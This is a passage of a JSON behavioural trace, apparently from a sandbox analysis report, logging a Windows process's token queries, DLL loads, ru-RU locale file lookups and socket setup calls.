"\\xf0\\xb4\\xd4\\x05\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1341 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6ec0", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": false, "return": "0xffffffffc0000023", "pretty_return": "BUFFER_TOO_SMALL", "arguments": [ { "name": "TokenInformationClass", "value": "5" }, { "name": "TokenInformation", "value": "" } ], "repeated": 0, "id": 1342 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6f0e", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "5" }, { "name": "TokenInformation", "value": "\\xa8\\xd3\\x98\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\x01\\x02\\x00\\x00" } ], "repeated": 0, "id": 1343 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6f37", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": false, "return": "0xffffffffc0000023", "pretty_return": "BUFFER_TOO_SMALL", "arguments": [ { "name": "TokenInformationClass", "value": "6" }, { "name": "TokenInformation", "value": "" } ], "repeated": 0, "id": 1344 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d6f8f", "parentcaller": "0x7ffee34a8d8f", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "6" }, { "name": "TokenInformation", "value": "H\\xac\\xd4\\x05\\x00\\x00\\x00\\x00\\x02\\x00P\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x10\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x00\\x10\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x05\\x12\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x00\\xa0\\x01\\x03\\x00\\x00\\x00\\x00\\x00\\x05\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1do\\x01\\x00" } ], "repeated": 0, "id": 1345 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d7048", "parentcaller": "0x7ffee34d6fa8", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "41" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x88\\x9b\\x8f\\xb7\\xfe\\x7f\\x00\\x00+\\x06h\\xb7\\xfe\\x7f\\x00\\x00u\\xad\\x99\\xb1U\\x13\\x00\\x00\\x80\\xba\\x8b\\xb7\\xfe\\x7f\\x00\\x00 \\xdc\\x15\\x07\\x00\\x00\\x00\\x00\\x18\\xdc\\x15\\x07\\x00\\x00\\x00\\x00\\xe8\\xdb\\x15\\x07\\x00\\x00\\x00\\x00\\x08\\xdc\\x15\\x07" } ], "repeated": 0, "id": 1346 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34d707b", "parentcaller": "0x7ffee34d6fa8", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "41" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\xac\\xd4\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x19{i\\xb7\\xfe\\x7f\\x00\\x00#\\x00\\x00\\xc0\\x00\\x00\\x00\\x00\\x08\\xda\\x15\\x07\\x00\\x00\\x00\\x00\\x90\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x9a\\x00i\\xa3\\xfe\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xaa\n\\x8c\\xb7" } ], "repeated": 0, "id": 1347 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34ed41f", "parentcaller": "0x7ffee34a99ff", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "P\\xdd\\x15\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x98\\xe2\\x15\\x07\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x81i\\x02!" } ], "repeated": 0, "id": 1348 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34ed48d", "parentcaller": "0x7ffee34a99ff", "category": "process", "api": "NtQueryInformationToken", "status": false, "return": "0xffffffffc0000023", "pretty_return": "BUFFER_TOO_SMALL", "arguments": [ { "name": "TokenInformationClass", "value": "2" }, { "name": "TokenInformation", "value": "" } ], "repeated": 0, "id": 1349 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34ed4da", "parentcaller": "0x7ffee34a99ff", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "2" }, { "name": "TokenInformation", "value": "\\x0e\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\xe7\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x84\\xe7\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x90\\xe7\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x9c\\xe7\\xd3\\x05\\x00\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xac\\xe7\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\xbc\\xe7\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc8\\xe7\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\r\\x00\\x00\\x00\\xd4\\xe7\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe0\\xe7\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xec\\xe7\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf8\\xe7\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\xc0\\xfe\\x7f\\x00\\x00\\x0c\\xe8\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\xe8\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00(\\xe8\\xd3\\x05\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f" } ], "repeated": 0, "id": 1350 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee10c6785", "parentcaller": "0x7ffee3350e27", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000048c" } ], "repeated": 0, "id": 1351 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee10c6785", "parentcaller": "0x7ffee3350e49", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000490" } ], "repeated": 0, "id": 1352 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee34b3f7a", "parentcaller": "0x7ffee3350ed7", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1353 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "3408", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffee22cb9b2", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\fwpuclnt" }, { "name": "DllBase", "value": "0x7ffed8cb0000" } ], "repeated": 0, "id": 1354 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "3408", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffee22cb9b2", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\FWPUCLNT.DLL" }, { "name": "BaseAddress", "value": "0x7ffed8cb0000" } ], "repeated": 0, "id": 1355 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "3408", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffee22cb9b2", "category": "system", "api": "LoadLibraryExW", "status": true, "return": "0x7ffed8cb0000", "arguments": [ { "name": "lpLibFileName", "value": "C:\\Windows\\System32\\fwpuclnt.dll" }, { "name": "dwFlags", "value": "0x00000000" } ], "repeated": 0, "id": 1356 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "3408", "caller": "0x7ffee10cac31", "parentcaller": "0x7ffee22cb9e9", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "fwpuclnt.dll" }, { "name": "ModuleHandle", "value": "0x7ffed8cb0000" }, { "name": "FunctionName", "value": "NamespaceCallout" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffed8cb2900" } ], "repeated": 0, "id": 1357 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "3408", "caller": "0x7ffee110026b", "parentcaller": "0x7ffed8cb35f2", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x000004a8" } ], "repeated": 0, "id": 1358 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "3408", "caller": "0x7ffed8cb361f", "parentcaller": "0x7ffed8cb2c4c", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1359 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "3408", "caller": "0x7ffee10c6785", "parentcaller": "0x7ffed8cb363d", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004a8" } ], "repeated": 0, "id": 1360 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "3408", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05d4d000" }, { "name": "RegionSize", "value": "0x00005000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1361 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "3408", "caller": "0x7ffee34b3f7a", "parentcaller": "0x7ffee3350ed7", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1362 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "3408", "caller": "0x7ffee10bf84f", "parentcaller": "0x7ffed8cb2752", "category": "synchronization", "api": "NtOpenEvent", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004b0" }, { "name": "EventName", "value": "Global\\BFE_Notify_Event_{84bd6d5b-b916-4f9f-a15b-b1c01c01482a}" } ], "repeated": 0, "id": 1363 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "3408", "caller": "0x7ffee10c6785", "parentcaller": "0x7ffed8cb2d61", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004b0" } ], "repeated": 0, "id": 1364 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "3408", "caller": "0x7ffee22c4f08", "parentcaller": "0x7ffee22c739f", "category": "network", "api": "socket", "status": true, "return": "0x000004b0", "arguments": [ { "name": "af", "value": "23", "pretty_value": "AF_INET6" }, { "name": "type", "value": "2", "pretty_value": "SOCK_DGRAM" }, { "name": "protocol", "value": "0" }, { "name": "socket", "value": "1200" } ], "repeated": 0, "id": 1365 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "3408", "caller": "0x7ffee0265419", "parentcaller": "0x7ffee22c54fa", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000103", "arguments": [ { "name": "FileHandle", "value": "0x000004b0" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x19\\x00\\x00\\xc8\\x01\\x00\\x00\\x00\\xa0\\xd3\\x98\\x00\\x00\\x00\\x00\\x00(\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\x00\\x00?\\x00\\\\x00@\\x85\\x98\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00d\\x00o\\x00\\\\x85\\x98\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1366 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "3408", "caller": "0x7ffee02680fc", "parentcaller": "0x7ffee02654a3", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000046c" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 1367 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "3408", "caller": "0x7ffee22c4f8a", "parentcaller": "0x7ffee22c739f", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1200" } ], "repeated": 0, "id": 1368 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffec77b1ce0", "parentcaller": "0x7ffec77b1bc8", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1369 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffec77b0ac2", "parentcaller": "0x7ffec77af117", "category": "network", "api": "WSASocketW", "status": true, "return": "0x000004a8", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1192" } ], "repeated": 0, "id": 1370 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffec77b0b3b", "parentcaller": "0x7ffec77af117", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1192" }, { "name": "level", "value": "0x7ffe0000ffff" }, { "name": "optname", "value": "0x00003007" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1371 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffec77b0b82", "parentcaller": "0x7ffec77af117", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1192" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1372 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffec77b0bb8", "parentcaller": "0x7ffec77af117", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1192" }, { "name": "level", "value": "0x7ffe00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1373 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee10b30ce", "parentcaller": "0x7ffee22c9653", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1374 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee10b30ce", "parentcaller": "0x7ffee22c9653", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003a8" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 1375 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05d52000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1376 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee10b30ce", "parentcaller": "0x7ffee22c9653", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1377 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee10b30ce", "parentcaller": "0x7ffee22c9653", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003a8" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 1378 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee22d0ed8", "parentcaller": "0x7ffee22d0d4d", "category": "system", "api": "LoadLibraryExW", "status": true, "return": "0x7ffee0260000", "arguments": [ { "name": "lpLibFileName", "value": "C:\\Windows\\System32\\mswsock.dll" }, { "name": "dwFlags", "value": "0x00000022" } ], "repeated": 0, "id": 1379 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee34a84c4", "parentcaller": "0x7ffee34bd136", "category": "registry", "api": "NtOpenKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU" } ], "repeated": 0, "id": 1380 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee34bbb2a", "parentcaller": "0x7ffee34bb99e", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004b0" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\ru-RU\\mswsock.dll.mui" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 1381 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee34bbb82", "parentcaller": "0x7ffee34bb99e", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000004b4" }, { "name": "DesiredAccess", "value": "0x000f0005", "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x000004b0" }, { "name": "FileName", "value": "C:\\Windows\\System32\\ru-RU\\mswsock.dll.mui" } ], "repeated": 0, "id": 1382 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee34bbbcc", "parentcaller": "0x7ffee34bb99e", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000004b4" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02f00000" }, { "name": "SectionOffset", "value": "0x06d5da60" }, { "name": "ViewSize", "value": "0x00004000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1383 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee34bbbdc", "parentcaller": "0x7ffee34bb99e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004b4" } ], "repeated": 0, "id": 1384 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee22d0ed8", "parentcaller": "0x7ffee22d0d4d", "category": "system", "api": "LoadLibraryExW", "status": true, "return": "0x7ffee0260000", "arguments": [ { "name": "lpLibFileName", "value": "C:\\Windows\\System32\\mswsock.dll" }, { "name": "dwFlags", "value": "0x00000022" } ], "repeated": 4, "id": 1385 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee22d0ed8", "parentcaller": "0x7ffee22d0d4d", "category": "system", "api": "LoadLibraryExW", "status": true, "return": "0x02f10002", "arguments": [ { "name": "lpLibFileName", "value": "C:\\Windows\\System32\\wshqos.dll" }, { "name": "dwFlags", "value": "0x00000022" } ], "repeated": 0, "id": 1386 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee34a84c4", "parentcaller": "0x7ffee34bd136", "category": "registry", "api": "NtOpenKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU" } ], "repeated": 0, "id": 1387 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee34bbb2a", "parentcaller": "0x7ffee34bb99e", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004b4" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\ru-RU\\wshqos.dll.mui" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 1388 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee34bbb82", "parentcaller": "0x7ffee34bb99e", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000004b8" }, { "name": "DesiredAccess", "value": "0x000f0005", "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x000004b4" }, { "name": "FileName", "value": "C:\\Windows\\System32\\ru-RU\\wshqos.dll.mui" } ], "repeated": 0, "id": 1389 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee34bbbcc", "parentcaller": "0x7ffee34bb99e", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000004b8" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05450000" }, { "name": "SectionOffset", "value": "0x06d5da60" }, { "name": "ViewSize", "value": "0x00001000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1390 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee34bbbdc", "parentcaller": "0x7ffee34bb99e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004b8" } ], "repeated": 0, "id": 1391 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee34da871", "parentcaller": "0x7ffee10bad69", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05450000" }, { "name": "RegionSize", "value": "0x00001000" } ], "repeated": 0, "id": 1392 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee34da87f", "parentcaller": "0x7ffee10bad69", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004b4" } ], "repeated": 0, "id": 1393 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee10bad9e", "parentcaller": "0x7ffee22d0f45", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02f10000" }, { "name": "RegionSize", "value": "0x0000a000" } ], "repeated": 0, "id": 1394 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee22d0ed8", "parentcaller": "0x7ffee22d0d4d", "category": "system", "api": "LoadLibraryExW", "status": true, "return": "0x02f10002", "arguments": [ { "name": "lpLibFileName", "value": "C:\\Windows\\System32\\wshqos.dll" }, { "name": "dwFlags", "value": "0x00000022" } ], "repeated": 0, "id": 1395 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee34a84c4", "parentcaller": "0x7ffee34bd136", "category": "registry", "api": "NtOpenKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU" } ], "repeated": 0, "id": 1396 }, { "timestamp": "2025-11-20 10:58:35,172", "thread_id": "1596", "caller": "0x7ffee34bbb2a", "parentcaller": "0x7ffee34bb99e", "category": 